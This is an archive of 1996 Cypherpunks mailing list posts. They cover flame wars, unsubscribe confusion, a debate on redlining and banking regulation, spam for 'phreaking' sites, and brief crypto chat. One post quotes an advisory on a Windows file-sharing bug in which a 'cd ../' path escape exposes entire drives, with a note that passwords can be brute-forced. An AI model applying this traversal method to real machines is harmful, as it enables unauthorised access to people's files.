do apologize for my negligence. I shall endeavor to spell
you name correctly in the future.

> "Cypher punks" are a gang of uncouth juveniles

     I'm not sure I understand the relevance of this 
comment. Was it made in response to my error in spelling? 
In any case, it is a good example of the informal logical 
fallacy of 'over generalization'. As I understand it, there 
are circa 1000 people subscribed to Cypherpunks.  To paint
an entire group with such a characterization is both
illogical and unfair. I also question your use of the
word 'uncouth'.  I have seen no posts on Cypherpunks
that were any more 'uncultured; crude; or boorish' than
those posted by you.  I am not saying that uncouth posts
have not been made by others, but it is disingenuous for
one to judge others by a standard that one does not apply
to one's self.

> What logic? "Cypher punks" such as Paul Bradley are incapable of
> discussing a technical topic (such as Don Wood's IPG proposal) without
> putting "(spit)" after Don's name

I could be wrong, but I believe this was done as an 
intentional parody of your own similar posts. If it is
illogical for Paul Bradley to do this, does it not follow
that is was illogical when you did it as well?

It is obvious to me that you are an intelligent person.
I am concerned, however, with your apparent intellectual
dishonesty.  It would appear that you know perfectly well
that your posts serve no purpose in the cause of promoting
privacy through the use of cryptography.  It is hard to
draw any other conclusion then that you are intentionally
being provocative for the purpose of disrupting the work
of this list.  If this is not so, I apologize, but how
else can we judge your actions?  Please step outside of
yourself for a moment and give us an honest self-assessment
of your behavior and the motives behind it.

Respectfully yours,

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Dec 1996 23:55:25 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
In-Reply-To: <199612040600.WAA16892@kachina.jetcafe.org>
Message-ID: <Pine.SUN.3.91.961203233536.10915A-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 3 Dec 1996, Dave Hayes wrote:
> The very existance of the "profane" keeps the "sacred" in
> existance as well. If you cannot see that, then John Grubor's
> lesson is wasted on you.

If this bit of verbal legerdemain makes any sense at all 
(Logos?), then Grubor must be personally responsible for the
existance of every saint on the Catholic calendar...not.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 22:11:08 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <yu7DyD56w165w@bwalk.dm.com>
Message-ID: <199612040602.AAA05560@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> Jeff Ubois <jubois@netcom.com> writes:
> > secretary. In 47 states welfare pays more than a janitor earns. Indeed, in
> > the 6 most generous states, benefits exceed the entry-level salary for a
> > computer programmer.
> 
> Igor may be in a better position to comment on welfare benefits in Oklahoma,
> but I find the above statement highly questionable. New York is one of the
> most generous states. An entry-level computer programmer with a B.S. and
> no work experience fetches 45K on the average. Sure beats welfare.
> 

I am not an entry-level computer programmer, sorry.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 22:12:51 -0800 (PST)
To: varange@crl.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <Love@22843>
Message-ID: <199612040606.AAA05594@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Troy Varange wrote:
> 
> Igor Chudov @ home <ichudov@algebra.com> writing [ 1422] bytes in <$m2n26165-.199612031615.KAA03400@manifold.algebra.com> said:
> 
> > This is primarily addressed to the person who supports cypherpunks
> > mail-to-news gateway. If you know who such person is, please send
> > his/her address to me.
> > 
> > Please modify your reposting program so that it does not remove the
> > 
> > 		X-No-Archive: yes 
> > 
> > header line from email messages. This particular header line is an
> > indication to USENET search engines that the author of the message would
> > not like it to be stored in these engines. It preserves the author's
> > privacy and enforces the copyright protection.
> 	
> 	"X-No-Archive: yes" is for idiots.  Who wants to censor
> 	their own posts?

Why don't you let "idiots" do what they want.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 4 Dec 1996 00:01:11 -0800 (PST)
To: cypherpunks@toad.com>
Subject: Re:
In-Reply-To: <01BBE1B6.8E8BBA80@modem-2.vpress.se>
Message-ID: <v03007800aecae1132afd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:41 AM +0100 12/4/96, Jens Melander wrote:
>unsuscribe cyberpunks
     ^b       ^^ph

...and the wrong address, of course.

The correct information follows. Please use your cut-and-paste editing
tools to ensure you spell things correctly.

--Tim May




To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 4 Dec 1996 00:17:22 -0800 (PST)
To: Angel Luis Ortiz Ruiz <zeen@caribe.net>
Subject: Angel and Javier can't unsubscribe!
In-Reply-To: <Pine.SUN.3.91.961202223007.24305E-100000@crl5.crl.com>
Message-ID: <v03007801aecae3e3d400@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:46 PM -0400 12/3/96, Angel Luis Ortiz Ruiz wrote:

>
>	Friend: Thank's for your asnswer but I already do that. The server say
>that I'm not in the list but I still reacive the messages. Thankx


And then there was another message:

At 6:00 PM -0400 12/3/96, Javier Rivera wrote:

>        Friend: Thank's for your asnswer but I already do that. The
>server say that I'm not in the list but I still reacive the messages.
>Thankx again!



Both seemed to come from "zeen@caribe.net". One under the Ruiz name, the
other under the Rivera name. And similar messages, both in broken English.

I suggest Angel and Javier get together and decide which one of them is the
name they or it subscribed under, and use that. Oh, and I have a sneaking
suspicion they sent in the increasingly-canonical "unsuscribe" or
"unscribe" misspelling.

I'm beginning to think that Cypherpunks appeals especially to morons.

--Tim May




To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Tue, 3 Dec 1996 22:03:46 -0800 (PST)
To: "Phillip M. Hallam-Baker" <cypherpunks@toad.com>
Subject: Re: Anyone considered adding crypto into Microsoft Outlook?
Message-ID: <3.0.32.19961204010208.00949a80@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:44 PM 12/3/96 -0500, Phillip M. Hallam-Baker wrote:
[[It just struck me that it would probably make the most convenient
platform for integrating cryptography. After all MAPI is an open,
extensible API allowing ready access to the email "hooks" necessary. The
integration of an address book with the email system makes it very easy to
add public key information into a person's entry. ]]

It's already been done with MS Exchange.  I assume that this new version
("Outlook", did you call it?) is backwards compatible with Exchange
plugins.  Take a look at:
http://homepage.interaccess.com/~jon/

[[The main problem so far seems to be the impenetrability of the MAPI
documentation. Does anyone know of a usable reference or which of the
gazillion Microsoft Developer network CDs one can find more information?]]

Well, the MAPI SDK used to me on the MS FTP server, but I don't know where
it is since they did their reorganization.


Rick Osborne / osborne@gateway.grumman.com / Northrop Grumman Corporation
-------------------------------------------------------------------------
"A few memory locations short of an address space." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Tue, 3 Dec 1996 22:56:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: AOL
Message-ID: <961204015554_1985863255@emout03.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


yes.... they did knock off that $3.00 an hour thing. now.. $20.00 unlimited..
I'd hate to do an AOL spam to the list.. but someone asked.. and for all you
that say 'get a real internet provider'. Well.. I get ALL the same access
most of you do. No shell account...But I can telnet from AOL to one. So
there. Nah nah nah =}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolf <dlchris@minot.ndak.net>
Date: Wed, 4 Dec 1996 00:14:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cool Website Check it out
Message-ID: <32A54106.EDF@minot.ndak.net>
MIME-Version: 1.0
Content-Type: text/plain


Check out my cool website at http://members.tripod.com/~wolf16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 3 Dec 1996 23:39:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612040725.AA18903@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 PM 12/3/1996, Matthew J. Miszewski wrote:
>At 01:45 PM 12/3/96 EST, Bovine Remailer wrote:
>>At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>>>Take, for example, the practice of redlining.  How are people who live in
>>>"bad" neighborhoods supposed to not reveal that information.
>>
>>You may lend your own money to whomever you wish.  If you do not wish
>>to lend money to somebody, that is your business.
>
>I consider it my business also, when people are denied opportunity because
>of where they live.

Why not simply disagree with me?  You do not believe that people may
lend their very own money, earned honestly, to anybody they please.

If you are ashamed of that, change your mind.  If you are not ashamed,
proclaim it the world and justify it.

>I may also hire whomever I wish, but I would have to pay the
>consequences if I happened to discriminate based on a protected class
>while doing so.  That is the society in which I live.  If I dont like
>it, I try to change it.  Our society is not libertarian.

Current policy doesn't matter if we are discussing the wisdom or
justice of possible policies.

>If I would prefer that form of society I would have to accept that
>result.  Therefore I choose a balance between liberty and social
>justice.

It isn't clear to me whether you are discussing policy options or
whether one should violate laws one does not like.  When an action is
illegal, it is still permissible to discuss its legalization.

>There are times when government should intervene.  I believe it
>should be as infrequent as possible, but would not want to live in a
>society where disinfranchised people have no possible recourse.  Your
>choice would apparently be different.

Perhaps.  In any event, it is important to understand precisely the
mechanisms through which people are disenfranchised, if that is in
fact what has happened.  It is also important to understand the
ramifications of phrases like "no possible recourse".  To borrow
money?  It is safe to say that most poor people should be saving money
rather than borrowing it.

>>It is difficult to understand why redlining should be illegal, to the
>>extent that it even occurs.  When it does occur, we expect that eager
>>entrepreneurs such as yourself will rush in to grab new customers.
>
>I have not heard serious doubts for a while that redlining occurs.

It seems likely that people draw lines around certain areas and decide
not to lend money there.  What is less clear is that this is
unreasonable.  There may be a few good credit risks in poor
neighborhoods.  But, it may just be too much trouble weeding through
the others to make it a paying business.

It may also be the case that people lending money are behaving
irrationally and drawing lines around neighborhoods for simple racial
reasons and for no others.  There is a word for this: opportunity.

Bank of America was built by a man who perceived and exploited one
such opportunity.  Italian shop keepers in California could not get
good banking services for, it turned out, irrational reasons.

>I would love to have the financial wherewithal to startup such an
>enterprise.  Unfortuantely I reside in one such neighborhood.

People start businesses without their own capital all the time.  If
there really is such a great opportunity, go find some rich people.
Rich people, like other people, are always happy to hear about ways to
make more money.  They don't even have to put the money in for a long
time.  Once you've set up a package of mortgages, you can sell them
off on the CMO market which is liquid and, I believe, quite
colorblind.  The beauty of this scheme is that you can take your
profits right away and let other people take on the long term interest
rate risk, default risk, and management hassles.  This will make your
plan easier to sell to investors.

You might also look into the microlending market.  The idea is to lend
poor people small amounts of money (less than $10,000) to start
businesses and the like.  The default rates are claimed to be
surprisingly low.  I have my doubts, but it sounds as if you do not.
Good luck.

>It is difficult enough to raise money to run a small business (and
>turned out to be much easier to do without any bank lending at all).
>I have talked with people about starting their own banks.

In principle, there is no reason at all why banks are the only
institutions that can lend money for mortgages.  There may be legal
impediments, but then we are back to the actual culprit, the
government.

You might find that opening a bank was easier if all you had to do was
take deposits and lend money rather than wading through the morass of
legal requirements and paperwork.

>When you are working to make sure all the bills are paid it is a bit
>difficult to also build an entirely new socio-economic structure.

You don't have to build an entirely new socio-economic structure.  You
just have to find some good credit risks, some people with money to
lend, and put them together taking a cut for yourself, unless the
government has thrown up some obstacles to this.

>>Of course, we hardly live in a free banking era.  Most people would
>>prefer to bank with a company that respects their privacy.  Yet, banks
>>are so tightly controlled in the United States that they most often
>>will not dare to protect the privacy of their customers for fear of
>>regulatory consequences.  When the service is provided, it cannot be
>>advertised.
>
>Whom would the service be more readily available to? Who uses tax-havens?
>Who has access to swiss bank accounts?  Are you insinuating that my local
>bank actually has anonymous accounts and just won't tell me?  I wish that
>people DID value anonymous banking in this country.  The fact is they just
>don't care.

No, actually they do care, they just don't think (correctly) that they
can get it easily.

I have no idea if your local bank has "anonymous accounts".  More
probably, they have accounts for which they do not report transactions
in excess of $10,000, but which are held by people they know fairly
well.  This is more common than you might think, and not just for
laundering drug money.  Tax evasion is widely practiced.

>As long as they get short lines or myriads of ATM machines they are
>happy.  I am largely in favor of banking deregulation.  There are
>places where I simply draw the line.  Utter racism is one of them.

But wouldn't the racist banks be hurting their business?  Doesn't the
punishment go quite closely with the "crime"?

If you believe that there is a huge opportunity which the racist banks
(i.e., all of them) will not take advantage of, you had better explain
why there is nobody anywhere with any capital who wouldn't want to
make even more money off poor people.  Can it really be the case that
99+% of rich people will run fleeing from such a great opportunity?

Oh, and speaking of racism, where do wealthy African-Americans invest
their money?

>Everyone can now clamor that it just isnt true.  Banks have never
>discriminated.  Its all a big lie.  Whatever.

Banks have practiced discrimination, and not just against black
people.  They have been able to get away with it.  How?  Because the
government has protected the banking guild from competition.

If opening a bank were as easy as forming a corporation, you would not
see much discrimination, I assure you.  There is no reason why a bank
shouldn't be that easy to open.

>(snip)
>>You are in the unpleasant position of appealing for protection from
>>the very people who have robbed you of your privacy.
>
>You are right.  It is far from a perfect system.  We make trade-offs every
>day.

Appeals to the very people who are exploiting you are not likely
to meet with success, are they?

>The real world I live in is just not as simple as the Libertarian Wet
>Dream(TM).

Then it should be fairly easy to refute my points instead making
fatuous remarks such as the one above.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolf <dlchris@minot.ndak.net>
Date: Wed, 4 Dec 1996 00:59:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <32A54BB4.5A23@minot.ndak.net>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Tue, 3 Dec 1996 07:11:14 -0800 (PST)
To: dthorn@gte.net
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <32A3BBD6.1ECA@gte.net>
Message-ID: <199612031405.DAA02486@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 02 Dec 1996 21:34:14 -0800, Dale Thorn wrote:

   Bryce wrote:
   > whatever letters you want; you don't have the right to demand
   > that any particular thing be _done_ with those letters once
   > they arrive, in the absence of some contract to the contrary.

   In the interest of reducing the amount of argument, let's speak more
   precisely:  I think people *do* have the right to demand such a thing,

Do you indeed?  OK, I hereby demand that you set up a mailing list on
your computer for discussion of "censorship" on cypherpunks.

Why do I have the right to demand this?

   although they do *not* necessarily have the right to force such a thing.

do not *necessarily*??

Obviously they have no right to use force, since they have no right to
make such a demand in the first place.  But *if* they had such a
right, why on earth would you say they have no right to use force?
(You may not agree that they should be able to use physical force
themselves, but at least they should have a law or something to apply
pressure, right?  What kind of right is it if it has nothing at all
backing it up?)

   intelligent cypherpunk would misunderstand such a thing. Do you really
   believe that myself and other cypherpunks want to "seize" John's equip-
   ment, morally or otherwise?  You are correct about certain issues being

Yes.  You said so yourself, in this very same post.

   complex, but one of the big failings of the crowd who supported Gilmore
   on this action was their failure to understand the point I've made here -
   that we *do* understand basic property rights, etc.

This must be some newspeak interpretation of "understand" of which I
was not previously aware...

   How can I say this better?  Myself and a number of other people would
   really have appreciated it if John had defended himself.  The fact of

He had no need to defend himself.

Any attempt to "defend" himself from people who claim they have a
right to demand the use of his computer (if not *necessarily* to back
up said demand with force) would probably have been wasted effort
anyway.  [Yes, I know you think posting to cypherpunks is not "use" of
John's computer.  Substitute whatever word fits what you think it
*is*, if you must.]

   all these other would-be experts on cyber-rights and morals preaching
   to the list on behalf of Gilmore, and Gilmore being silent, argues
   (not proves, just argues) heavily in favor of Dimitri et al.

So Tim May's silence in response to Vulis's nonsense, while some
others came out in his favour "argues (not proves, just argues)
heavily in favor of Dimitri" too?  Yeah, sure!  Wanna buy a bridge?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
This Fortue Examined By INSPECTOR NO. 2-14




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolf <dlchris@minot.ndak.net>
Date: Wed, 4 Dec 1996 01:37:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Go to my website
Message-ID: <32A554B6.E9A@minot.ndak.net>
MIME-Version: 1.0
Content-Type: text/plain


Games,links,and a hacking page under construction
http://members.tripod.com/~wolf16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Wed, 4 Dec 1996 02:22:12 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: IP address
Message-ID: <01BBE19A.A32BF200@s22-pm03.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


Even greater than denial of service I believe that there are other threats.  Like I just found this file on c2.org (I believe it was) on using an IP address to explore somebody's hard drive under certain conditions.  

EXPORTING YOUR ENTIRE FILESYSTEM 

                                                Samba 

     When a Windows for Workgroups or Windows 95 machine shares any folder, bugs in Microsoft's SMB
     implementation over all network protocols allow access to the whole drive, with whatever permissions the sharename
     was given. These resources are advertised on a browse list that is made available to anyone on the local network by
     default, and to anyone on the Internet who knows the machine's IP address. Any user sharing any folder over TCP/IP
     without a password is opening the whole disk to the whole Internet (for those that can locate the machine) and those
     with a password should be aware that Windows has no protection against brute force attacks. SMBCLIENT, an
     ftp-style browser for any UNIX, plus a complete file system for Linux and a few UNIX versions, are available from the
     Samba web site. Please note that Samba's exploitation of this fundamental bug in Microsoft file sharing was
     unintentional, and was immediately reported to Microsoft. It could have happened with any client over any protocol. 

     An alleged fix for Windows for Workgroups was quietly released in early October, and Microsoft publicly announced a
     fix for Win95 on October 20th. It has not been rigorously tested, but it appears to fix the problem. The fix for Windows
     for Workgroups might not be a complete fix, but rather a patch for one way to exploit the problem. (The release version
     of Win95 prevented cd .. below the shared folder "root," but not cd ../) The patches and Microsoft press releases
     (which have been corrected at least twice, but which still erroneously identify Samba as shareware, neglect to credit the
     people who notified Microsoft of the problem, and neglect to mention that this is a fundamental bug in Windows, not a
     problem specific to TCP/IP or Samba) are available on Microsoft's Windows 95 Updates Page. The patch only works
     on the US/English version of Windows 95; at this writing, all non-English versions of Windows 95 are still vulnerable. 

Troy Varange wrote:
>	Well, the "danger" of posting a static IP must be even
>	greater than with a temporary IP.
>
>	Just call the police if you uncover a bonafide case of a
>	denial of service attack.  From what I gather, they take
>	this shit seriously, and have better capacities of
>	getting lazy admins to reveal the relevent data in their
>	logs.

I just have this gut feeling that sitting out here without any protection somebody could write something that could hook into a program, or even worse the system (i.e. Explorer).   Perhaps my fears are totally unfounded (besides above problem w/ samba), but I have not heard anyone say that one *is* secure.  -- Internaut
PS:  I am running win95 but feel free to answer this question for any os.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haygor@dtx.net (William Winans)
Date: Tue, 3 Dec 1996 20:20:57 -0800 (PST)
To: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Subject: Re: test new web site
In-Reply-To: <19460561CED@scholars.bellevue.edu>
Message-ID: <32a4fc5b.504896687@mail.dtx.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Dec 1996 15:13:14 CDT, you wrote:

>look at my page and tell me how you like it
>if you dont like it please tell Mr.Angry , just click on the un happy 
>face on that page for a quicker reply
>        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
>eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
>rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
>bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
>       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
>       PhIbErDeLiC PhReAkEr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haygor@dtx.net (William Winans)
Date: Tue, 3 Dec 1996 20:21:45 -0800 (PST)
To: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Subject: Re: test new web site
In-Reply-To: <19460561CED@scholars.bellevue.edu>
Message-ID: <32a4fcb1.504982851@mail.dtx.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Dec 1996 15:13:14 CDT, you wrote:

>look at my page and tell me how you like it
>if you dont like it please tell Mr.Angry , just click on the un happy 
>face on that page for a quicker reply
>        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
>eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
>rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
>bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
>       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
>       PhIbErDeLiC PhReAkEr



ENOUGH ALREADY!!!!!!!!!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haygor@dtx.net (William Winans)
Date: Tue, 3 Dec 1996 20:32:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <32a4fed3.505529414@mail.dtx.net>
MIME-Version: 1.0
Content-Type: text/plain


>try this site and tell me how you like it
>if you dont like it then message Mr.Angry on that page
>        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
>eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
>rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
>bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
>       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
>       PhIbErDeLiC PhReAkEr




ENOUGH ALREADY!!!!!!!1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Wed, 4 Dec 1996 02:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: testing
Message-ID: <199612041000.FAA10537@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 3 Dec 1996, Eric Murray wrote:

> Phiberelic Phreaker writes:
> > 
> >         PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
> > eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
> > rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
> > bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
> >        PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
> 
> 
> Evidently "PhReAkInG" causes uncontrollable ourbursts of CaPiTaLiZaTiOn due
> to horrible shift-key spasms...
> 
> 
> >        PhIbErDeLiC PhReAkEr
> 
> You probably want alt.2600, it'll be more your style.
> BTW, you've posted the same fucking message 4 times now.
> Plonk.

4 only? We have received over 30 copies of this shit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 4 Dec 1996 02:58:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sorry for the "TWIT" messages
Message-ID: <199612041216.GAA07370@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Well seems I had a rather intresting morining. :) After receiving several "Phreak messages
I went to modify my "twit" scripts. Unfortunatly the changes I made caused ~50 "twit"
messages to go out. My appologies to anyone who received these messages.

Thanks,

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: OS/2: Logic, not magic.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Musselman <c.musselman@internetmci.com>
Date: Wed, 4 Dec 1996 02:16:36 -0800 (PST)
To: Robert Hettinga <cypherpunks@toad.com
Subject: RE: Modulating the FM noise spectrum considered infeasible
Message-ID: <1.5.4.16.19961204051022.32b74fec@mail98.internetMCI.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 12/3/96 -0500, Bob Hettinga wrote:
>At 9:52 am -0500 12/3/96, James A. Tunnicliffe wrote:
>> At 2:55 am -0500 12/3/96, Timothy C. May wrote:
>>> [...]Having said this, Johnson noise makes a superior noise source,
>                          ^^^^^^^
>>> if a physical source is desired.
><snip>
>>Yours makes NOISE?  Impressive...
>>
>>In this case, I guess entropy is preferable to atrophy, though.  :-)
>
>Indeed.
>
>I've found that my Johnson only makes noise with the proper, er,
>peripheral, though...

Geez, guys, what's this?  Pound the physicist day?  Johnson noise
is the Brownian motion of electrons in an electronic circuit.  It
is the irreducible noise, often measured in temperature (obvious?)
Cheers,  Charley
"We accomplish what we work at."        | Rules from
"We get better at what we practice."    | childhood.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 04:34:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anyone considered adding crypto into Microsoft Outlook?
In-Reply-To: <01BBE14A.04580F10@crecy.ai.mit.edu>
Message-ID: <9PueyD62w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Phillip M. Hallam-Baker" <hallam@ai.mit.edu> writes:
> 	It just struck me that it would probably make the most convenient =
> platform for integrating cryptography. After all MAPI is an open, =
> extensible API allowing ready access to the email "hooks" necessary. The =
> integration of an address book with the email system makes it very easy =
> to add public key information into a person's entry.

Yes, this would be feasible. Problem is, "cypher punks" don't write code.
They only write flames and postmaster complaints.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 4 Dec 1996 06:54:32 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
In-Reply-To: <32A579A8.718@earthlink.net>
Message-ID: <Pine.SUN.3.91.961204064953.27386F-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

>   Well saints come on go on the Roman Catholic calander--doesn't
> mean a hell of a lot.

Obviously Steve has a defective "ironometer."
 
>   Dr. Grubor does an excellent job of bring the vermin out of
> the woodwork.

Yes, riding at the head of the pack.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 04:34:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <Love@22843>
Message-ID: <0VueyD63w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


varange@crl.com (Troy Varange) writes:
> 	"X-No-Archive: yes" is for idiots.  Who wants to censor
> 	their own posts?

Lame losers who call themselves "cypher punks" and bend over for John Gilmore.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 04:37:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: testing new Home Web site
In-Reply-To: <199612040406.XAA46358@osceola.gate.net>
Message-ID: <R2ueyD65w165w@bwalk.dm.com>
MIME-Version: 1.0
